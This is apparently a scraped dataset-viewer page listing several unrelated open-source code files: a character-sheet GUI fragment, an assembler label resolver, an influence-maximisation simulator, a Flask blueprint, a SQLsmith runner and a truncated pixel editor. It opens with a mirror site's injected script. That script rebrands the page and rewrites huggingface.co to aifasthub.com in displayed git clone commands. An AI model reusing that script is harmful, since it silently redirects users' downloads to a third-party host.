{ // 获取包含Hugging Face文本的span元素 const spans = link.querySelectorAll('span.whitespace-nowrap, span.hidden.whitespace-nowrap'); spans.forEach(span => { if (span.textContent && span.textContent.trim().match(/Hugging\s*Face/i)) { span.textContent = 'AI快站'; } }); }); // 替换logo图片的alt属性 document.querySelectorAll('img[alt*="Hugging"], img[alt*="Face"]').forEach(img => { if (img.alt.match(/Hugging\s*Face/i)) { img.alt = 'AI快站 logo'; } }); } // 替换导航栏中的链接 function replaceNavigationLinks() { // 已替换标记,防止重复运行 if (window._navLinksReplaced) { return; } // 已经替换过的链接集合,防止重复替换 const replacedLinks = new Set(); // 只在导航栏区域查找和替换链接 const headerArea = document.querySelector('header') || document.querySelector('nav'); if (!headerArea) { return; } // 在导航区域内查找链接 const navLinks = headerArea.querySelectorAll('a'); navLinks.forEach(link => { // 如果已经替换过,跳过 if (replacedLinks.has(link)) return; const linkText = link.textContent.trim(); const linkHref = link.getAttribute('href') || ''; // 替换Spaces链接 - 仅替换一次 if ( (linkHref.includes('/spaces') || linkHref === '/spaces' || linkText === 'Spaces' || linkText.match(/^s*Spacess*$/i)) && linkText !== 'OCR模型免费转Markdown' && linkText !== 'OCR模型免费转Markdown' ) { link.textContent = 'OCR模型免费转Markdown'; link.href = 'https://fast360.xyz'; link.setAttribute('target', '_blank'); link.setAttribute('rel', 'noopener noreferrer'); replacedLinks.add(link); } // 删除Posts链接 else if ( (linkHref.includes('/posts') || linkHref === '/posts' || linkText === 'Posts' || linkText.match(/^s*Postss*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } // 替换Docs链接 - 仅替换一次 else if ( (linkHref.includes('/docs') || linkHref === '/docs' || linkText === 'Docs' || linkText.match(/^s*Docss*$/i)) && linkText !== '模型下载攻略' ) { link.textContent = '模型下载攻略'; link.href = '/'; replacedLinks.add(link); } // 删除Enterprise链接 else if ( (linkHref.includes('/enterprise') || linkHref === '/enterprise' || linkText === 'Enterprise' || linkText.match(/^s*Enterprises*$/i)) 
) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } }); // 查找可能嵌套的Spaces和Posts文本 const textNodes = []; function findTextNodes(element) { if (element.nodeType === Node.TEXT_NODE) { const text = element.textContent.trim(); if (text === 'Spaces' || text === 'Posts' || text === 'Enterprise') { textNodes.push(element); } } else { for (const child of element.childNodes) { findTextNodes(child); } } } // 只在导航区域内查找文本节点 findTextNodes(headerArea); // 替换找到的文本节点 textNodes.forEach(node => { const text = node.textContent.trim(); if (text === 'Spaces') { node.textContent = node.textContent.replace(/Spaces/g, 'OCR模型免费转Markdown'); } else if (text === 'Posts') { // 删除Posts文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } else if (text === 'Enterprise') { // 删除Enterprise文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } }); // 标记已替换完成 window._navLinksReplaced = true; } // 替换代码区域中的域名 function replaceCodeDomains() { // 特别处理span.hljs-string和span.njs-string元素 document.querySelectorAll('span.hljs-string, span.njs-string, span[class*="hljs-string"], span[class*="njs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换hljs-string类的span中的域名(移除多余的转义符号) document.querySelectorAll('span.hljs-string, span[class*="hljs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换pre和code标签中包含git clone命令的域名 document.querySelectorAll('pre, code').forEach(element => { if (element.textContent && element.textContent.includes('git clone')) { const text = element.innerHTML; if (text.includes('huggingface.co')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 处理特定的命令行示例 document.querySelectorAll('pre, code').forEach(element => { const 
text = element.innerHTML; if (text.includes('huggingface.co')) { // 针对git clone命令的专门处理 if (text.includes('git clone') || text.includes('GIT_LFS_SKIP_SMUDGE=1')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 特别处理模型下载页面上的代码片段 document.querySelectorAll('.flex.border-t, .svelte_hydrator, .inline-block').forEach(container => { const content = container.innerHTML; if (content && content.includes('huggingface.co')) { container.innerHTML = content.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 特别处理模型仓库克隆对话框中的代码片段 try { // 查找包含"Clone this model repository"标题的对话框 const cloneDialog = document.querySelector('.svelte_hydration_boundary, [data-target="MainHeader"]'); if (cloneDialog) { // 查找对话框中所有的代码片段和命令示例 const codeElements = cloneDialog.querySelectorAll('pre, code, span'); codeElements.forEach(element => { if (element.textContent && element.textContent.includes('huggingface.co')) { if (element.innerHTML.includes('huggingface.co')) { element.innerHTML = element.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { element.textContent = element.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); } // 更精确地定位克隆命令中的域名 document.querySelectorAll('[data-target]').forEach(container => { const codeBlocks = container.querySelectorAll('pre, code, span.hljs-string'); codeBlocks.forEach(block => { if (block.textContent && block.textContent.includes('huggingface.co')) { if (block.innerHTML.includes('huggingface.co')) { block.innerHTML = block.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { block.textContent = block.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); }); } catch (e) { // 错误处理但不打印日志 } } // 当DOM加载完成后执行替换 if (document.readyState === 'loading') { document.addEventListener('DOMContentLoaded', () => { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); 
replaceNavigationLinks(); } }, 3000); }); } else { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); } // 增加一个MutationObserver来处理可能的动态元素加载 const observer = new MutationObserver(mutations => { // 检查是否导航区域有变化 const hasNavChanges = mutations.some(mutation => { // 检查是否存在header或nav元素变化 return Array.from(mutation.addedNodes).some(node => { if (node.nodeType === Node.ELEMENT_NODE) { // 检查是否是导航元素或其子元素 if (node.tagName === 'HEADER' || node.tagName === 'NAV' || node.querySelector('header, nav')) { return true; } // 检查是否在导航元素内部 let parent = node.parentElement; while (parent) { if (parent.tagName === 'HEADER' || parent.tagName === 'NAV') { return true; } parent = parent.parentElement; } } return false; }); }); // 只在导航区域有变化时执行替换 if (hasNavChanges) { // 重置替换状态,允许再次替换 window._navLinksReplaced = false; replaceHeaderBranding(); replaceNavigationLinks(); } }); // 开始观察document.body的变化,包括子节点 if (document.body) { observer.observe(document.body, { childList: true, subtree: true }); } else { document.addEventListener('DOMContentLoaded', () => { observer.observe(document.body, { childList: true, subtree: true }); }); } })(); \")\n if \"Geweiht I\" in Wolke.Char.vorteile:\n self.ui.spinKaP.setEnabled(True)\n self.ui.spinKaP.setValue(Wolke.Char.kap.wert)\n elif \"Paktierer I\" in Wolke.Char.vorteile:\n self.ui.spinKaP.setEnabled(True)\n self.ui.spinKaP.setValue(Wolke.Char.kap.wert)\n self.ui.lblKap.setText(\"GuP\")\n self.ui.lblKapZugekauft.setText(\"Gunstpunkte\")\n self.ui.lblKapZugekauft.setToolTip(\"

Ein Paktierer selbst verfügt nicht über übernatürliche Macht, sondern \"\\\n \"erbittet den Beistand seines Erzdämonen: Der Vorteil Paktierer I/II/III/IV verleiht ihm 8/16/24/32 Gunstpunkte (GuP), \"\\\n \"mit denen er den Erzdämon anrufen kann. GuP werden nach Steigerungsfaktor 1 gesteigert. Meist geschieht das, wenn der Paktierer \"\\\n \"ohnehin einen Kreis der Verdammnis aufsteigt oder dem Erzdämonen auf andere Weise nahe ist.

\")\n else:\n self.ui.spinKaP.setValue(0)\n self.ui.spinKaP.setEnabled(False)\n\n self.updateDerivedValues()\n\n self.currentlyLoading = False"},"avg_line_length":{"kind":"number","value":49.8781362007,"string":"49.878136"},"max_line_length":{"kind":"number","value":322,"string":"322"},"alphanum_fraction":{"kind":"number","value":0.6425697039,"string":"0.64257"}}},{"rowIdx":46348,"cells":{"hexsha":{"kind":"string","value":"b9a758d95904be8229412da42c0516b18ac23aa9"},"size":{"kind":"number","value":3957,"string":"3,957"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Assembler/labels.py"},"max_stars_repo_name":{"kind":"string","value":"Laegluin/mikrorechner"},"max_stars_repo_head_hexsha":{"kind":"string","value":"7e5e878072c941e422889465c43dea838b83e5fd"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2019-01-28T01:53:20.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2019-01-28T01:53:20.000Z"},"max_issues_repo_path":{"kind":"string","value":"Assembler/labels.py"},"max_issues_repo_name":{"kind":"string","value":"Laegluin/mikrorechner"},"max_issues_repo_head_hexsha":{"kind":"string","value":"7e5e878072c941e422889465c43dea838b83e5fd"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"Assembler/labels.py"},"max_forks_repo_name":{"kind":"string","value":"Laegluin/mikrorechner"},"max_forks_repo_head_hexsha":{"kind":"string","value":"7e5e878072c941e422889465c43dea838b83e5fd"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"import datastrings\nimport re\nimport exceptions as error\n\ndef process_labels(commands):\n try:\n return replace_labels_with_values(commands)\n except (error.label_duplicate_error,error.label_replacement_not_successful_error) as err:\n print(err.string)\n raise error.binary_file_not_creatable_exception('Binary File will not be created. Process has stoppd')\n\ndef replace_labels_with_values(commands):\n label_list = get_label_adress_dictionary(commands)\n label_values = get_label_values_dictionary(commands)\n commands_with_reljumps = commands\n labelname_options = '|'.join(label_list)\n addr = 0\n print('Input after replacing and cutting down Labels, with adresses')\n for line, command in enumerate(commands):\n if re.match('(jump)\\s+(to)\\s+(' + labelname_options + ')\\s*(_\\w+\\s*)?(\\s+#(.)*)?$', command):\n dest = label_list[command.split()[2]] - addr\n if dest - 4 > 0: commands_with_reljumps[line] = 'jump_rel to ' + str(dest)\n else: commands_with_reljumps[line] = 'jump_rel to ' + str(dest)\n elif re.match('(jump_if)\\s+(to)\\s+(' + labelname_options + ')\\s*(_\\w+\\s*)?$', command):\n dest = label_list[command.split()[2]] - addr\n if dest - 4 > 0: commands_with_reljumps[line] = 'jump_rel_if to ' + str(dest)\n else: commands_with_reljumps[line] = 'jump_rel_if to ' + str(dest)\n elif re.match('(R)\\d{1,2}\\s+(=)\\s+(' + labelname_options + ')\\s*$', command):\n words = command.split()\n replacement = replace_register_equals_label(words[0],label_values[words[2]])\n commands_with_reljumps = commands_with_reljumps[:line] + replacement + commands_with_reljumps[line+1:]\n print(str(addr) + ':\\t' + str(commands_with_reljumps[line]))\n try: addr += datastrings.necessary_byte_storage(command)\n except error.data_string_not_convertible_error: raise 
error.label_replacement_not_successful_error('Label konnten nicht ersetzt werden')\n print('\\n')\n return commands_with_reljumps\n\n#welches register dürfen wir zum zwischenspeichern benutzen?\ndef replace_register_equals_label(register, value):\n if datastrings.is_datastring(value):\n val = int(value,0)\n if val < 0: binary_string = '{0:{fill}{width}b}'.format((-124 + 2 ** 32) % 2 ** 32, fill='0', width=32)\n else: binary_string = '{0:{fill}{width}b}'.format(val, fill='0', width=32)\n replacement = [register + \" = 0b\" + binary_string[0:21],\n \"R3 = 11\",\n register + \" = \" + register + \" << R3 times\",\n \"R3 = 0b\" + binary_string[21:],\n register + \" = \" + register + \" | R3\"]\n return replacement\n return []\n\ndef get_label_adress_dictionary(commands):\n addr = 0\n label_duplicate = 0\n labels = {}\n for line, command in enumerate(commands):\n if(re.match(r'(.)*\\s+(_)[A-Za-z0-9_-]+\\s*$',command)):\n label_name = command.split()[-1][1:]\n for labelName in labels:\n if labelName == label_name: label_duplicate = 1\n if not label_duplicate:\n labels[label_name] = addr\n else:\n raise error.label_duplicate_error('Line ' + str(line+1) + ': Labelname ' + label_name + ' zweimal deklariert!')\n try: addr += datastrings.necessary_byte_storage(command)\n except error.data_string_not_convertible_error:\n print('Line ' + str(line+1) + ': datastring '+ command +'not convertible!')\n return labels\n\ndef get_label_values_dictionary(commands):\n labels_and_values = {}\n for line, command in enumerate(commands):\n if(re.match(r'(.)*\\s+(_)[A-Za-z0-9_-]+\\s*$',command)):\n label_name = command.split()[-1][1:]\n labels_and_values[label_name] = re.sub(r'_[A-Za-z0-9_-]+\\s*$','',command)\n return labels_and_values\n\n# if __name__ == '__main__':\n# 
start(sys.argv[0])"},"avg_line_length":{"kind":"number","value":50.0886075949,"string":"50.088608"},"max_line_length":{"kind":"number","value":144,"string":"144"},"alphanum_fraction":{"kind":"number","value":0.6285064443,"string":"0.628506"}}},{"rowIdx":46349,"cells":{"hexsha":{"kind":"string","value":"e06a857fedc36a097de58ff641e29f6ee75a71f1"},"size":{"kind":"number","value":3883,"string":"3,883"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"CS303/lab7-9/work/ISE/ISE.py"},"max_stars_repo_name":{"kind":"string","value":"Wycers/Codelib"},"max_stars_repo_head_hexsha":{"kind":"string","value":"86d83787aa577b8f2d66b5410e73102411c45e46"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":22,"string":"22"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2018-08-07T06:55:10.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-06-12T02:12:19.000Z"},"max_issues_repo_path":{"kind":"string","value":"CS303/lab7-9/work/ISE/ISE.py"},"max_issues_repo_name":{"kind":"string","value":"Wycers/Codelib"},"max_issues_repo_head_hexsha":{"kind":"string","value":"86d83787aa577b8f2d66b5410e73102411c45e46"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":28,"string":"28"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2020-03-04T23:47:22.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-02-26T18:50:00.000Z"},"max_forks_repo_path":{"kind":"string","value":"CS303/lab7-9/work/ISE/ISE.py"},"max_forks_repo_name":{"kind":"string","value":"Wycers/Codelib"},"max_forks_repo_head_hexsha":{"kind":"string","value":"86d83787aa577b8f2d66b5410e73102411c45e46"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_forks_count":{"kind":"number","value":4,"string":"4"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2019-11-09T15:41:26.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2021-10-10T08:56:57.000Z"},"content":{"kind":"string","value":"from queue import Queue\nimport multiprocessing as mp\nimport time\nimport sys\nimport argparse\nimport os\nimport random\nimport numpy as np\n\nworker_num = 8\nepoch = 2000\n\n\nclass Node:\n def __init__(self, name, threshold=None):\n self.name = name\n self.next = []\n self.weight = []\n\n\nclass Worker(mp.Process):\n def __init__(self):\n super(Worker, self).__init__(target=self.start)\n self.inQ = mp.Queue()\n self.outQ = mp.Queue()\n\n def run(self):\n while True:\n model, nodes, seeds = self.inQ.get()\n if model == 'IC':\n self.outQ.put(IC(nodes, seeds))\n elif model == 'LT':\n self.outQ.put(LT(nodes, seeds))\n\n\ndef IC(nodes, seeds):\n random.seed(int(os.getpid() + time.time() * 1e3 + 114514))\n\n cnt = 0\n queue = []\n acted = [0]* len(nodes)\n\n for i in seeds:\n queue.append(i)\n acted[i.name] = 1\n cnt = cnt + 1\n\n while(len(queue) != 0):\n for i in range(len(queue[0].next)) :\n if acted[queue[0].next[i].name] == 0 :\n ret = random.random()\n if ret <= queue[0].weight[i] :\n cnt = cnt + 1\n acted[queue[0].next[i].name] = 1\n queue.append(queue[0].next[i])\n\n del queue[0]\n return sum([1 for node in nodes if acted[node.name]])\n\n\ndef LT(nodes, seeds):\n random.seed(int(os.getpid() + time.time() * 1e3 + 114514))\n\n queue = [[], []]\n now = 0\n\n acted = [False] * len(nodes)\n threshold = [random.random() for _ in nodes]\n\n for i in seeds:\n queue[now].append(i)\n\n while len(queue[now]) > 0:\n for u in queue[now]:\n acted[u.name] = True\n for i in range(len(u.next)):\n threshold[u.next[i].name] -= u.weight[i]\n\n for u in queue[now]:\n for i in range(len(u.next)):\n if acted[u.next[i].name]:\n continue\n if threshold[u.next[i].name] > 0:\n continue\n 
queue[now ^ 1].append(u.next[i])\n acted[u.next[i].name] = True\n queue[now] = []\n now ^= 1\n\n return sum([1 for node in nodes if acted[node.name]])\n\n\nif __name__ == '__main__':\n start = time.time()\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--file_name', type=str, default='network.txt')\n parser.add_argument('-s', '--seed', type=str, default='seed1.txt')\n parser.add_argument('-m', '--model', type=str, default='IC')\n parser.add_argument('-t', '--time_limit', type=int, default=120)\n\n args = parser.parse_args()\n time_limit = args.time_limit\n\n nodes = []\n with open(args.file_name) as f:\n line = f.readline()\n tmp = line.split(' ')\n N = int(tmp[0])\n for i in range(N+1):\n nodes.append(Node(int(i)))\n\n for line in f:\n tmp = line.split(' ')\n\n l = int(tmp[0].strip())\n r = int(tmp[1].strip())\n w = float(tmp[2].strip())\n nodes[l].next.append(nodes[r])\n nodes[l].weight.append(w)\n\n seeds = []\n with open(args.seed) as f:\n for line in f:\n tmp = int(line.strip())\n seeds.append(nodes[tmp])\n\n sys.setrecursionlimit(1000000)\n\n if worker_num == 0 or epoch == 0:\n exit(0)\n\n random.seed(int(os.getpid() + time.time() * 1e3 + 114514))\n\n workers = []\n for i in range(worker_num):\n workers.append(Worker())\n workers[i].start()\n\n data = (args.model, nodes, seeds)\n for i in range(epoch):\n workers[i % worker_num].inQ.put(data)\n\n totalsum = 0\n for i in range(epoch):\n totalsum += workers[i % worker_num].outQ.get()\n\n print(totalsum/epoch)\n # print(time.time() - start)\n\n for w in workers:\n w.terminate()\n\n\n 
sys.stdout.flush()\n\n"},"avg_line_length":{"kind":"number","value":24.7324840764,"string":"24.732484"},"max_line_length":{"kind":"number","value":77,"string":"77"},"alphanum_fraction":{"kind":"number","value":0.5238217873,"string":"0.523822"}}},{"rowIdx":46350,"cells":{"hexsha":{"kind":"string","value":"0ef0f3a4830852c838985588d6408ba9048c6404"},"size":{"kind":"number","value":176,"string":"176"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"app/admin/__init__.py"},"max_stars_repo_name":{"kind":"string","value":"uosorio/heroku_face"},"max_stars_repo_head_hexsha":{"kind":"string","value":"7d6465e71dba17a15d8edaef520adb2fcd09d91e"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"number","value":73,"string":"73"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2018-12-14T18:12:33.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-02-23T21:39:59.000Z"},"max_issues_repo_path":{"kind":"string","value":"app/admin/__init__.py"},"max_issues_repo_name":{"kind":"string","value":"uosorio/heroku_face"},"max_issues_repo_head_hexsha":{"kind":"string","value":"7d6465e71dba17a15d8edaef520adb2fcd09d91e"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_issues_count":{"kind":"number","value":4,"string":"4"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2019-11-23T18:08:18.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2021-08-23T09:00:15.000Z"},"max_forks_repo_path":{"kind":"string","value":"app/admin/__init__.py"},"max_forks_repo_name":{"kind":"string","value":"uosorio/heroku_face"},"max_forks_repo_head_hexsha":{"kind":"string","value":"7d6465e71dba17a15d8edaef520adb2fcd09d91e"},"max_forks_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n 
\"Apache-2.0\"\n]"},"max_forks_count":{"kind":"number","value":33,"string":"33"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2019-06-03T00:30:57.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-10T23:54:43.000Z"},"content":{"kind":"string","value":"\"\"\"\n\nAUTOR: Juanjo\n\nFECHA DE CREACIÓN: 24/05/2019\n\n\"\"\"\n\nfrom flask import Blueprint\n\nadmin_bp = Blueprint('admin', __name__, template_folder='templates')\n\nfrom . import routes\n"},"avg_line_length":{"kind":"number","value":12.5714285714,"string":"12.571429"},"max_line_length":{"kind":"number","value":68,"string":"68"},"alphanum_fraction":{"kind":"number","value":0.7272727273,"string":"0.727273"}}},{"rowIdx":46351,"cells":{"hexsha":{"kind":"string","value":"161c7247d8f7e839d50d1d287907b990848d49ad"},"size":{"kind":"number","value":1288,"string":"1,288"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"scripts/runsqlsmith.py"},"max_stars_repo_name":{"kind":"string","value":"AldoMyrtaj/duckdb"},"max_stars_repo_head_hexsha":{"kind":"string","value":"3aa4978a2ceab8df25e4b20c388bcd7629de73ed"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":2816,"string":"2,816"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2018-06-26T18:52:52.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-04-06T10:39:15.000Z"},"max_issues_repo_path":{"kind":"string","value":"scripts/runsqlsmith.py"},"max_issues_repo_name":{"kind":"string","value":"AldoMyrtaj/duckdb"},"max_issues_repo_head_hexsha":{"kind":"string","value":"3aa4978a2ceab8df25e4b20c388bcd7629de73ed"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_issues_count":{"kind":"number","value":1310,"string":"1,310"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-04-06T16:04:52.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-03-31T13:52:53.000Z"},"max_forks_repo_path":{"kind":"string","value":"scripts/runsqlsmith.py"},"max_forks_repo_name":{"kind":"string","value":"AldoMyrtaj/duckdb"},"max_forks_repo_head_hexsha":{"kind":"string","value":"3aa4978a2ceab8df25e4b20c388bcd7629de73ed"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":270,"string":"270"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2021-04-09T06:18:28.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-31T11:55:37.000Z"},"content":{"kind":"string","value":"\n# run SQL smith and collect breaking queries\nimport os\nimport re\nimport subprocess\nimport sys\nimport sqlite3\nfrom python_helpers import open_utf8\n\nsqlsmith_db = 'sqlsmith.db'\nsqlsmith_test_dir = 'test/sqlsmith/queries'\n\nexport_queries = False\n\ncon = sqlite3.connect(sqlsmith_db)\nc = con.cursor()\n\nif len(sys.argv) == 2:\n\tif sys.argv[1] == '--export':\n\t\texport_queries = True\n\telif sys.argv[1] == '--reset':\n\t\tc.execute('DROP TABLE IF EXISTS sqlsmith_errors')\n\telse:\n\t\tprint('Unknown query option ' + sys.argv[1])\n\t\texit(1)\n\nif export_queries:\n\tc.execute('SELECT query FROM sqlsmith_errors')\n\tresults = c.fetchall()\n\tfor fname in os.listdir(sqlsmith_test_dir):\n\t\tos.remove(os.path.join(sqlsmith_test_dir, fname))\n\n\tfor i in range(len(results)):\n\t\twith open(os.path.join(sqlsmith_test_dir, 'sqlsmith-%d.sql' % (i + 1)), 'w+') as f:\n\t\t\tf.write(results[i][0] + \"\\n\")\n\texit(0)\n\ndef run_sqlsmith():\n\tsubprocess.call(['build/debug/third_party/sqlsmith/sqlsmith', '--duckdb=:memory:'])\n\n\nc.execute('CREATE TABLE IF NOT EXISTS sqlsmith_errors(query 
VARCHAR)')\n\nwhile True:\n\t# run SQL smith\n\trun_sqlsmith()\n\t# get the breaking query\n\twith open_utf8('sqlsmith.log', 'r') as f:\n\t\ttext = re.sub('[ \\t\\n]+', ' ', f.read())\n\n\tc.execute('INSERT INTO sqlsmith_errors VALUES (?)', (text,))\n\tcon.commit()\n\n"},"avg_line_length":{"kind":"number","value":23.8518518519,"string":"23.851852"},"max_line_length":{"kind":"number","value":85,"string":"85"},"alphanum_fraction":{"kind":"number","value":0.701863354,"string":"0.701863"}}},{"rowIdx":46352,"cells":{"hexsha":{"kind":"string","value":"164cb532a76617daac24630c5cbab3d72c4bf693"},"size":{"kind":"number","value":2203,"string":"2,203"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"robolib/robogui/pixel_editor.py"},"max_stars_repo_name":{"kind":"string","value":"Obyoxar/RobolabStatistics"},"max_stars_repo_head_hexsha":{"kind":"string","value":"08343ca3ac49df7efdac33692d7cc4b783e851f5"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":2,"string":"2"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2017-11-30T21:12:11.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2017-12-01T07:52:43.000Z"},"max_issues_repo_path":{"kind":"string","value":"robolib/robogui/pixel_editor.py"},"max_issues_repo_name":{"kind":"string","value":"Obyoxar/RobolabStatistics"},"max_issues_repo_head_hexsha":{"kind":"string","value":"08343ca3ac49df7efdac33692d7cc4b783e851f5"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_issues_count":{"kind":"number","value":14,"string":"14"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2017-11-14T18:12:53.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2018-06-03T16:07:57.000Z"},"max_forks_repo_path":{"kind":"string","value":"robolib/robogui/pixel_editor.py"},"max_forks_repo_name":{"kind":"string","value":"Obyoxar/RobolabStatistics"},"max_forks_repo_head_hexsha":{"kind":"string","value":"08343ca3ac49df7efdac33692d7cc4b783e851f5"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":3,"string":"3"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2018-02-05T10:40:03.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2018-02-09T09:29:19.000Z"},"content":{"kind":"string","value":"import cv2\nimport numpy as np\nfrom robolib.images.feature_extraction import resize_image_to_info\n\n__DEFAULT_CONTINUE_KEYS = [27, 13, 32]\n\n\ndef get_pixel_input_raw(rows, cols, name=\"Edit Image\", dtype=np.float32, low=-1, high=1, continue_keys=None):\n return np.array(_get_pixel_input_raw(rows, cols, name, dtype, low, high, continue_keys)[:, :])\n\n\ndef _get_pixel_input_raw(rows, cols, name=\"Edit Image\", dtype=np.float32, low=-1, high=1, continue_keys=None):\n \"\"\"Get a small image drawn by the user.\"\"\"\n\n if continue_keys is None:\n continue_keys = __DEFAULT_CONTINUE_KEYS\n\n def draw_circle(event, x, y, flags, param):\n if 0 <= x < img.shape[1] and 0 <= y < img.shape[0]:\n if event in [cv2.EVENT_MOUSEMOVE, cv2.EVENT_LBUTTONDOWN] and flags & cv2.EVENT_FLAG_LBUTTON:\n img[y, x] = low if flags & cv2.EVENT_FLAG_SHIFTKEY else high\n\n img = np.empty((rows, cols, 1), dtype)\n img.fill(low)\n\n cv2.namedWindow(name, cv2.WINDOW_KEEPRATIO)\n cv2.setMouseCallback(name, draw_circle)\n\n while True:\n cv2.imshow(name, img)\n if wait_for_end_key(continue_keys):\n break\n 
